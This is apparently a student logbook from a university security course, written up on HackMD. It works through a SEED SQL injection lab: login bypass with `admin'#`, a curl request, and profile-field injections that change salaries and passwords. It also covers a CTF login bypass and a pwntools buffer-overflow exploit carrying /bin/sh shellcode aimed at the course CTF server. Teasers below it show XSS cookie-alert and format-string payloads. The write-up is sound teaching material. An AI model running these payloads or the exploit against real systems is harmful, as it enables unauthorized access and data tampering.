# LOGBOOK 8 ## TASK 1: In this task, we interact with the MySQL database through a shell in the docker container. We login with `mysql -u root -pdees`, select the database `Database changed` and see the tables `show tables;`: ![](https://i.imgur.com/KRM3h5m.png) We then use the SQL query `SELECT * FROM credential WHERE name='alice';` to print Alice's information: | ID | Name | EID | Salary | birth | SSN | PhoneNumber | Address | Email | NickName | Password | | 1 | Alice | 10000 | 20000 | 9/20 | 10211002 ||||| fdbe918bdae83000aa54747fc95fe0470fff4976 | ![](https://i.imgur.com/floX9CR.png) ## TASK 2.1 In order to login as an admin, we inject the the following username: `admin'#` or `admin'--`. Taking into account this query: ![](https://i.imgur.com/btx5Qm5.png) Our input closes the first quotes on `'$input_uname'` allowing us to write SQL code before the next quotes begin. As such we type `#` or `--` to comment out the rest of the line, thereby commenting the section password part of the query. Due to this we can type any password or simply leave it empty and the login will always be accepted. ![](https://i.imgur.com/TpA0Bmg.png) ![](https://i.imgur.com/XkOBP3w.png) ## TASK 2.2 Much like in task 2.1 we want to login with the username `admin'#`, but this time through the terminal. To achieve this we use the curl command to make a request to the server. However, special characters are encoded so we need to replace `'` with `%27` and `#` with `%23`. Our command looks like this: `curl 'www.seed-server.com/unsafe_home.php?username=admin%27%23'`. We get as a response the HTML document of the page with the credentials of all the employes. ![](https://i.imgur.com/NfiLf4J.png) ## TASK 2.3 To alter the database, we turn our input into 2 SQL queries. For this we would type, on the username input, something like this: `admin'; UPDATE credentials SET name='Hacked' WHERE name='alice'; #`. This however doesn't work because in PHP’s mysqli extension, the mysqli::query() API doesn’t allow multiple queries to run in the database server. As is writen in the SQL Injection Attacks slides found [here](https://www.handsonsecurity.net/resources.html). ## TASK 3 ### TASK 3.1 - By logging in as Alice we can see that her salary is 20000 at the start. ![](https://i.imgur.com/O2Vc6yl.png) - By going to the edit profile page, and analising the code given: `$hashed_pwd = sha1($input_pwd);$sql = "UPDATE credential SETnickname=’$input_nickname’,email=’$input_email’,address=’$input_address’,Password=’$hashed_pwd’,PhoneNumber=’$input_phonenumber’WHERE ID=$id;";$conn->query($sql);` - We noticed that we can change the salary by doing for example the following query:`912345678', salary = '9999999' WHERE name='Alice'; #`, in one of the forms. This query completes the value of the form chosen (in this case the phone number) and then proceeds to write the query to change the salary and comment the rest of the code so only this query is executed. ![](https://i.imgur.com/y6KKlEm.png) - And by going back to the Alice profile we can see that we indeed changed her salary. ![](https://i.imgur.com/nbXgIOQ.png) ### TASK 3.2 - Like we did in the last task, we can change the salary of the user Boby to 1$ by doing the following query: `912345678', salary = '1' WHERE name='Bob'; #`, in one of the forms. ![](https://i.imgur.com/Q40anZa.png) - This time to check if the query was succesful we logged in into admin and checked the User Details page, and confirmed that indeed the Boby salary was changed. ![](https://i.imgur.com/2fJJKFl.png) ### TASK 3.3 - Now we want to change Boby's password so we can login into his account, we follow the same solution used previously to edit other fields. - But this time since the password is saved as an hash sha1 of the inputed data we need to change the value to the sha1 of the password we want to use in the login. - So in the phone number field we write the following:`912345678', password=sha1('1234') WHERE name='Boby'; #`. ![](https://i.imgur.com/FEJz0bo.png) - So logging out of Alice's account and logging in to Boby account with the new 1234 password we have access to his profile. ![](https://i.imgur.com/4hciGBq.png) - As we can see by the image: ![](https://i.imgur.com/IVVaI0y.png) # CTF challenge 1 By viewing the source code we realize the code has vulnerability in the folowing lines, because the input is not verified and the verification for the password is made after the verification of the username, which allow us to do an SQL injection. ``` $username = $_POST['username']; $password = $_POST['password']; $query = "SELECT username FROM user WHERE username = '".$username."' AND password = '".$password."'"; ``` This situation is similar to the one we observed in the lab in the task 2, so we can apply the same strategy here. If we write`admin'--` in the username and anything in the password we login successfully because we insert the username we wish to login and then we close the input with the quotes and then we write `--` to comment the query that verifies the password. ![](https://i.imgur.com/MWYJE05.png) This way we login and get the flag. ![](https://i.imgur.com/v17b9PO.png) # CTF challenge 2 - By running checksec in the program we get the following output: ![](https://i.imgur.com/7SecaxP.png) - That there is no NX and there are no cannaries, which means we can do a buffer overflows easily. - PIE is enabled so the program and files are not always on the same memory position in every run. - Analising the code we verify that the vulnerabilty is in the line: `gets(buffer);` which allows us to do the buffer overflow. - We can use the same file exploit-example.py from the other buffer overflow CTF's with some changes. - By debugging the program with a breakpoin on the line pointed out we see that: ![](https://i.imgur.com/6P5AS5b.png) - The buffer starts on 0xffffd010 - The ebp is on 0xffffd078 - Although the addresses change in every execution the distance between the addresses is always the same. - So if we subtract the addresses the difference is 104 in decimal value. - So by changing the python script used on week 5 to work with the remote and to read the starting address we get the following: ``` #!/usr/bin/python3 from pwn import * p = remote('ctf-fsi.fe.up.pt',4001) # read address from output buffer= p.recvuntil(b"input:")[43:43+11] buffer = int(buffer,16) # Replace the content with the actual shellcode shellcode= ( "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" "\xd2\x31\xc0\xb0\x0b\xcd\x80" ).encode('latin-1') # Fill the content with NOP's content = bytearray(0x90 for i in range(500)) # Put the shellcode somewhere in the payload start = 450 # Change this number content[start:start + len(shellcode)] = shellcode # Decide the return address value # and put it somewhere in the payload ret = buffer+start # Change this number offset = 104 + 4 # Change this number L = 4 # Use 4 content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') p.sendline(content) p.interactive() ``` Running this code gets us a shell in the host machine of `ctf-fsi.fe.up.pt`, with port 4001. So we `cat flag.txt` and get the flag. ![](https://i.imgur.com/As04PX9.png)
Last changed by  
FSI l14g02
109

Read more

PFL_TP2_T08_Yoxii_4

Elementos: André Morais (50% contribuição) Lucas Sousa (50% contribuição) Instalação e Execução: Após instalar o SICTUS PROLOG é apenas preciso de consultar o ficheiro main.pl:consult('main.pl') e rodar o comando play. para poder começar a jogar. Descrição do jogo: Yoxii é um jogo que para ganhar devemos de circular o totem com as nossas peças mais fortes. O totem começa no centro do tabuleiro de jogo, que possui 37 quadrados e se assemelha a um retângulo sem cantos.

1/2/2023
LOGBOOK11

Task 1 In order to become a root CA we copied the openssl.cnf file to our directory, and edited it, created an empty index.txt file and a serial file with content 1000. We then used the following command to generate the ca.crt and ca.key: openssl req -x509 -newkey rsa:4096 -sha256 -days 3650 \ -keyout ca.key -out ca.crt \ -subj "/CN=www.modelCA.com/O=Model CA LTD./C=US" \ -passout pass:dees ca.crt:

12/22/2022
LOGBOOK 10

Tarefas #1 a #4 Task #1 To embed a javascript profile in our profile, in the editing page we typed <script>alert('XSS');</script> in the brief description area. Now when we view our profile, the script is executed and we see an alert with XSS. Task #2 In order to display a user's cookies, we typed the following script on our brief description section in the profile: <script>alert(document.cookie);</script>

12/8/2022
LOGBOOK 6

TASK 1 In order to crash the program running in the docker container we send a message with the %s formatter. By doing echo %s the program will print the memory address in string format, but has the memory address can't be converted into a string the program crashes, as we can see because it didn't print: (^_^)(^_^) Returned properly (^_^)(^_^). TASK 2.A To discover how many %x we need for the server to print out our input we sent a mesage composed of @@@@ and many %x. We chose @@@@ because it's easy to recognize in hexadecimal as 40404040. We discovered our input in the 64th position of the server output. TASK 2.B In order to print out the secret message, we modified build_string.py to build our message. The message has the adress of the secret message, taking into account little-endian adresses, followed by 63 %x and a %s to print the message. In the server container we see that the secret message is A secret message. TASK 3.A

11/18/2022
Read more from FSI l14g02
Published on HackMD